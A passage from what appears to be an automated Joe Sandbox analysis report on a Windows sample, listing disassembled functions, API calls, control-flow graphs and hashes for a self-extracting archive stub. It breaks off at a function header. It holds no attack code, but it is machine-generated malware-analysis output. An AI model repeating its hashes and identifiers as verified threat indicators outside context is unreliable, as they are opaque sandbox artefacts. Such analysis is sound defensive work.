                                                          • Instruction Fuzzy Hash: 4932E1729002089BCF24EF6ACC46BEE77A9FF04310F54052AFA0597291EBB5D985EF51
                                                          Function 00FCD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00FCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCB579
                                                            • Part of subcall function 00FCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB58A
                                                            • Part of subcall function 00FCB568: IsDialogMessageW.USER32(00010444,?), ref: 00FCB59E
                                                            • Part of subcall function 00FCB568: TranslateMessage.USER32(?), ref: 00FCB5AC
                                                            • Part of subcall function 00FCB568: DispatchMessageW.USER32(?), ref: 00FCB5B6
                                                          • GetDlgItem.USER32(00000068,0100FCB8), ref: 00FCD4E8
                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00FCAF07,00000001,?,?,00FCB7B9,00FE506C,0100FCB8,0100FCB8,00001000,00000000,00000000), ref: 00FCD510
                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FCD51B
                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FE35F4), ref: 00FCD529
                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FCD53F
                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FCD559
                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FCD59D
                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FCD5AB
                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FCD5BA
                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FCD5E1
                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FE43F4), ref: 00FCD5F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                          • String ID: \
                                                          • API String ID: 3569833718-2967466578
                                                          • Opcode ID: 599adad0a4ad0b230c8e58e73d65b27f7869614368fe916f34fcc848f7b1eb51
                                                          • Instruction ID: 149d1b527e6a9d021423f7add7f357c2a07d822d5a538a1bf8a78c61e0c83137
                                                          • Opcode Fuzzy Hash: 599adad0a4ad0b230c8e58e73d65b27f7869614368fe916f34fcc848f7b1eb51
                                                          • Instruction Fuzzy Hash: A831CF71145346AFE322DF209C5BFAB7FACFB82728F000918F5919A180DB6E9905D776
                                                          Function 00FCD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 837 fcd78f-fcd7a7 call fcec50 840 fcd7ad-fcd7b9 call fd3e13 837->840 841 fcd9e8-fcd9f0 837->841 840->841 844 fcd7bf-fcd7e7 call fcfff0 840->844 847 fcd7e9 844->847 848 fcd7f1-fcd7ff 844->848 847->848 849 fcd801-fcd804 848->849 850 fcd812-fcd818 848->850 851 fcd808-fcd80e 849->851 852 fcd85b-fcd85e 850->852 854 fcd837-fcd844 851->854 855 fcd810 851->855 852->851 853 fcd860-fcd866 852->853 858 fcd86d-fcd86f 853->858 859 fcd868-fcd86b 853->859 856 fcd84a-fcd84e 854->856 857 fcd9c0-fcd9c2 854->857 860 fcd822-fcd82c 855->860 861 fcd854-fcd859 856->861 862 fcd9c6 856->862 857->862 863 fcd882-fcd898 call fbb92d 858->863 864 fcd871-fcd878 858->864 859->858 859->863 865 fcd82e 860->865 866 fcd81a-fcd820 860->866 861->852 870 fcd9cf 862->870 873 fcd89a-fcd8a7 call fc1fbb 863->873 874 fcd8b1-fcd8bc call fba231 863->874 864->863 867 fcd87a 864->867 865->854 866->860 869 fcd830-fcd833 866->869 867->863 869->854 872 fcd9d6-fcd9d8 870->872 876 fcd9da-fcd9dc 872->876 877 fcd9e7 872->877 873->874 882 fcd8a9 873->882 883 fcd8be-fcd8d5 call fbb6c4 874->883 884 fcd8d9-fcd8e6 ShellExecuteExW 874->884 876->877 880 fcd9de-fcd9e1 ShowWindow 876->880 877->841 880->877 882->874 883->884 884->877 886 fcd8ec-fcd8f9 884->886 888 fcd90c-fcd90e 886->888 889 fcd8fb-fcd902 886->889 891 fcd925-fcd944 call fcdc3b 888->891 892 fcd910-fcd919 888->892 889->888 890 fcd904-fcd90a 889->890 890->888 893 fcd97b-fcd987 CloseHandle 890->893 891->893 906 fcd946-fcd94e 891->906 892->891 901 fcd91b-fcd923 ShowWindow 892->901 895 fcd998-fcd9a6 893->895 896 fcd989-fcd996 call fc1fbb 893->896 895->872 900 fcd9a8-fcd9aa 895->900 896->870 896->895 900->872 902 fcd9ac-fcd9b2 900->902 901->891 902->872 905 fcd9b4-fcd9be 902->905 905->872 906->893 907 fcd950-fcd961 GetExitCodeProcess 906->907 907->893 908 fcd963-fcd96d 907->908 909 fcd96f 908->909 910 fcd974 908->910 909->910 910->893
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00FCD7AE
                                                          • ShellExecuteExW.SHELL32(?), ref: 00FCD8DE
                                                          • ShowWindow.USER32(?,00000000), ref: 00FCD91D
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00FCD959
                                                          • CloseHandle.KERNEL32(?), ref: 00FCD97F
                                                          • ShowWindow.USER32(?,00000001), ref: 00FCD9E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                          • String ID: .exe$.inf
                                                          • API String ID: 36480843-3750412487
                                                          • Opcode ID: a9146afc89732f4ae6d809ebd7bf05ecefe1727a6f267b98c9a25d49f9078c26
                                                          • Instruction ID: 6fe0d1e2bc2f2259139f5a8e9d244800ba1464185b99a25b9d47bea7d364f554
                                                          • Opcode Fuzzy Hash: a9146afc89732f4ae6d809ebd7bf05ecefe1727a6f267b98c9a25d49f9078c26
                                                          • Instruction Fuzzy Hash: 945124748043869AEB319F249A46FBFBBE4AF81764F04042EF5C097191D7B98944FB12
                                                          Function 00FDA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 911 fda95b-fda974 912 fda98a-fda98f 911->912 913 fda976-fda986 call fdef4c 911->913 915 fda99c-fda9c0 MultiByteToWideChar 912->915 916 fda991-fda999 912->916 913->912 921 fda988 913->921 918 fda9c6-fda9d2 915->918 919 fdab53-fdab66 call fcfbbc 915->919 916->915 922 fda9d4-fda9e5 918->922 923 fdaa26 918->923 921->912 924 fdaa04-fdaa15 call fd8e06 922->924 925 fda9e7-fda9f6 call fe2010 922->925 927 fdaa28-fdaa2a 923->927 930 fdab48 924->930 937 fdaa1b 924->937 925->930 936 fda9fc-fdaa02 925->936 927->930 931 fdaa30-fdaa43 MultiByteToWideChar 927->931 935 fdab4a-fdab51 call fdabc3 930->935 931->930 934 fdaa49-fdaa5b call fdaf6c 931->934 941 fdaa60-fdaa64 934->941 935->919 940 fdaa21-fdaa24 936->940 937->940 940->927 941->930 943 fdaa6a-fdaa71 941->943 944 fdaaab-fdaab7 943->944 945 fdaa73-fdaa78 943->945 947 fdaab9-fdaaca 944->947 948 fdab03 944->948 945->935 946 fdaa7e-fdaa80 945->946 946->930 949 fdaa86-fdaaa0 call fdaf6c 946->949 951 fdaacc-fdaadb call fe2010 947->951 952 fdaae5-fdaaf6 call fd8e06 947->952 950 fdab05-fdab07 948->950 949->935 963 fdaaa6 949->963 954 fdab09-fdab22 call fdaf6c 950->954 955 fdab41-fdab47 call fdabc3 950->955 951->955 966 fdaadd-fdaae3 951->966 952->955 967 fdaaf8 952->967 954->955 969 fdab24-fdab2b 954->969 955->930 963->930 968 fdaafe-fdab01 966->968 967->968 968->950 970 fdab2d-fdab2e 969->970 971 fdab67-fdab6d 969->971 972 fdab2f-fdab3f WideCharToMultiByte 970->972 971->972 972->955 973 fdab6f-fdab76 call fdabc3 972->973 973->935
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FD5695,00FD5695,?,?,?,00FDABAC,00000001,00000001,2DE85006), ref: 00FDA9B5
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FDABAC,00000001,00000001,2DE85006,?,?,?), ref: 00FDAA3B
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FDAB35
                                                          • __freea.LIBCMT ref: 00FDAB42
                                                            • Part of subcall function 00FD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          • __freea.LIBCMT ref: 00FDAB4B
                                                          • __freea.LIBCMT ref: 00FDAB70
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1414292761-0
                                                          • Opcode ID: 93996eaa2b4825280f8e6db9be03b508f08ca3d92846d8a7984547b19c8da28f
                                                          • Instruction ID: 890282e831608dbc2d6755e3ca2570ed872b2fef0438885435c18d07077de973
                                                          • Opcode Fuzzy Hash: 93996eaa2b4825280f8e6db9be03b508f08ca3d92846d8a7984547b19c8da28f
                                                          • Instruction Fuzzy Hash: 7A51E672A00216ABDB258F64CC41EBFB7ABEB80720F1D466BFC04D6240DB78DC41E659
                                                          Function 00FD3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 976 fd3b72-fd3b7c 977 fd3bee-fd3bf1 976->977 978 fd3b7e-fd3b8c 977->978 979 fd3bf3 977->979 981 fd3b8e-fd3b91 978->981 982 fd3b95-fd3bb1 LoadLibraryExW 978->982 980 fd3bf5-fd3bf9 979->980 983 fd3c09-fd3c0b 981->983 984 fd3b93 981->984 985 fd3bfa-fd3c00 982->985 986 fd3bb3-fd3bbc GetLastError 982->986 983->980 987 fd3beb 984->987 985->983 990 fd3c02-fd3c03 FreeLibrary 985->990 988 fd3bbe-fd3bd3 call fd6088 986->988 989 fd3be6-fd3be9 986->989 987->977 988->989 993 fd3bd5-fd3be4 LoadLibraryExW 988->993 989->987 990->983 993->985 993->989
                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00FD3C35,?,?,01012088,00000000,?,00FD3D60,00000004,InitializeCriticalSectionEx,00FE6394,InitializeCriticalSectionEx,00000000), ref: 00FD3C03
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: api-ms-
                                                          • API String ID: 3664257935-2084034818
                                                          • Opcode ID: b52ac3c2c0e3e87c4b0e1a14354ed248f2012ab4a226a2c72e4709cb68bbae8b
                                                          • Instruction ID: 33e611cd098e8224b6088d9dcb70b7348b7467a6d2e4da79c4d598c0664433a3
                                                          • Opcode Fuzzy Hash: b52ac3c2c0e3e87c4b0e1a14354ed248f2012ab4a226a2c72e4709cb68bbae8b
                                                          • Instruction Fuzzy Hash: 2311A732E45225ABCB228B589C8975937A69F41770F290213EB55FB390D771EF00AAD2
                                                          Function 00FCAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00FC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FC0836
                                                            • Part of subcall function 00FC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FBF2D8,Crypt32.dll,00000000,00FBF35C,?,?,00FBF33E,?,?,?), ref: 00FC0858
                                                          • OleInitialize.OLE32(00000000), ref: 00FCAC2F
                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FCAC66
                                                          • SHGetMalloc.SHELL32(00FF8438), ref: 00FCAC70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                          • String ID: riched20.dll$3To
                                                          • API String ID: 3498096277-2168385784
                                                          • Opcode ID: 4b1f8d27edb2e6687c538bdcc32f862ed2e56be60e6c4397aec0aa4654d7b456
                                                          • Instruction ID: 3dbb21dcb00caceeb5afae20773968a377dd06298adeb6c5ba51741fdfe3d7f3
                                                          • Opcode Fuzzy Hash: 4b1f8d27edb2e6687c538bdcc32f862ed2e56be60e6c4397aec0aa4654d7b456
                                                          • Instruction Fuzzy Hash: 56F04FB1900209ABCB10AFA9D949AAFFBFCFF84700F00405AA445F2241CBB856059FA1
                                                          Function 00FB98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 998 fb98e0-fb9901 call fcec50 1001 fb990c 998->1001 1002 fb9903-fb9906 998->1002 1004 fb990e-fb991f 1001->1004 1002->1001 1003 fb9908-fb990a 1002->1003 1003->1004 1005 fb9921 1004->1005 1006 fb9927-fb9931 1004->1006 1005->1006 1007 fb9933 1006->1007 1008 fb9936-fb9943 call fb6edb 1006->1008 1007->1008 1011 fb994b-fb996a CreateFileW 1008->1011 1012 fb9945 1008->1012 1013 fb99bb-fb99bf 1011->1013 1014 fb996c-fb998e GetLastError call fbbb03 1011->1014 1012->1011 1016 fb99c3-fb99c6 1013->1016 1019 fb99c8-fb99cd 1014->1019 1020 fb9990-fb99b3 CreateFileW GetLastError 1014->1020 1018 fb99d9-fb99de 1016->1018 1016->1019 1022 fb99ff-fb9a10 1018->1022 1023 fb99e0-fb99e3 1018->1023 1019->1018 1021 fb99cf 1019->1021 1020->1016 1024 fb99b5-fb99b9 1020->1024 1021->1018 1026 fb9a2e-fb9a39 1022->1026 1027 fb9a12-fb9a2a call fc0602 1022->1027 1023->1022 1025 fb99e5-fb99f9 SetFileTime 1023->1025 1024->1016 1025->1022 1027->1026
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00FB7760,?,00000005,?,00000011), ref: 00FB995F
                                                          • GetLastError.KERNEL32(?,?,00FB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FB996C
                                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00FB7760,?,00000005,?), ref: 00FB99A2
                                                          • GetLastError.KERNEL32(?,?,00FB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FB99AA
                                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00FB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FB99F9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: File$CreateErrorLast$Time
                                                          • String ID:
                                                          • API String ID: 1999340476-0
                                                          • Opcode ID: d1a65d19a241695e1da4c1d4f1e537d53a850b06b5f9a893d22e69a65a23718a
                                                          • Instruction ID: beb5ca4a75c8b69a1db60f2df9993c4b8bc324d329a1b4398c3abdb88f5e3df4
                                                          • Opcode Fuzzy Hash: d1a65d19a241695e1da4c1d4f1e537d53a850b06b5f9a893d22e69a65a23718a
                                                          • Instruction Fuzzy Hash: 49311630948345AFE7309F25CC4ABDABBA4BB44334F100B1DF6A1961D1D7E4A544EF95
                                                          Function 00FCB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1057 fcb568-fcb581 PeekMessageW 1058 fcb5bc-fcb5be 1057->1058 1059 fcb583-fcb597 GetMessageW 1057->1059 1060 fcb5a8-fcb5b6 TranslateMessage DispatchMessageW 1059->1060 1061 fcb599-fcb5a6 IsDialogMessageW 1059->1061 1060->1058 1061->1058 1061->1060
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCB579
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB58A
                                                          • IsDialogMessageW.USER32(00010444,?), ref: 00FCB59E
                                                          • TranslateMessage.USER32(?), ref: 00FCB5AC
                                                          • DispatchMessageW.USER32(?), ref: 00FCB5B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                          • String ID:
                                                          • API String ID: 1266772231-0
                                                          • Opcode ID: f5f82e01f67c7d232b311f4ed2b8a249878adcd186bb790bd5c6a020ab11ec0d
                                                          • Instruction ID: bcf686ebba76dca6d51aa5537c151df4678e1fb3dabadb276fd844c6700434d1
                                                          • Opcode Fuzzy Hash: f5f82e01f67c7d232b311f4ed2b8a249878adcd186bb790bd5c6a020ab11ec0d
                                                          • Instruction Fuzzy Hash: 6AF0BD75E0111AABCB209BE59D4DEEB7FBCEE056A17044415B549D6008EB7CD505CBB0
                                                          Function 00FCABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1062 fcabab-fcabca GetClassNameW 1063 fcabcc-fcabe1 call fc1fbb 1062->1063 1064 fcabf2-fcabf4 1062->1064 1069 fcabf1 1063->1069 1070 fcabe3-fcabef FindWindowExW 1063->1070 1066 fcabff-fcac01 1064->1066 1067 fcabf6-fcabf9 SHAutoComplete 1064->1067 1067->1066 1069->1064 1070->1069
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000050), ref: 00FCABC2
                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00FCABF9
                                                            • Part of subcall function 00FC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FBC116,00000000,.exe,?,?,00000800,?,?,?,00FC8E3C), ref: 00FC1FD1
                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00FCABE9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                          • String ID: EDIT
                                                          • API String ID: 4243998846-3080729518
                                                          • Opcode ID: 093f53c14c4b18c1e1cdc06debf8d23e84d10a373e80fae9c72e3e96632e4d95
                                                          • Instruction ID: 162b8601a1427ee732e9cb5b25824bac04d9366432f1227b54018db6b6607cf9
                                                          • Opcode Fuzzy Hash: 093f53c14c4b18c1e1cdc06debf8d23e84d10a373e80fae9c72e3e96632e4d95
                                                          • Instruction Fuzzy Hash: EBF0E932A0022976DB3056245C06F9B76ACAB82B20F080029B944A6084D769EE4196B6
                                                          Function 00FCDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1071 fcdbde-fcdc09 call fcec50 SetEnvironmentVariableW call fc0371 1075 fcdc0e-fcdc12 1071->1075 1076 fcdc14-fcdc18 1075->1076 1077 fcdc36-fcdc38 1075->1077 1078 fcdc21-fcdc28 call fc048d 1076->1078 1081 fcdc1a-fcdc20 1078->1081 1082 fcdc2a-fcdc30 SetEnvironmentVariableW 1078->1082 1081->1078 1082->1077
                                                          APIs
                                                          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FCDBF4
                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FCDC30
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: EnvironmentVariable
                                                          • String ID: sfxcmd$sfxpar
                                                          • API String ID: 1431749950-3493335439
                                                          • Opcode ID: 4a22e5d2b1ce182aa2dde304255b7d399b40cb68e2b95d280f07c3751dd3b17d
                                                          • Instruction ID: 6719f8617d68197c8cb4aed31a9720e3153e358f0ad899b5b3f77e06e17b18b1
                                                          • Opcode Fuzzy Hash: 4a22e5d2b1ce182aa2dde304255b7d399b40cb68e2b95d280f07c3751dd3b17d
                                                          • Instruction Fuzzy Hash: C8F0EC7280523AE7CB205F958E4BFFF375CAF04B91B04046DBD859A151D6B8C940F6B1
                                                          Function 00FB9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
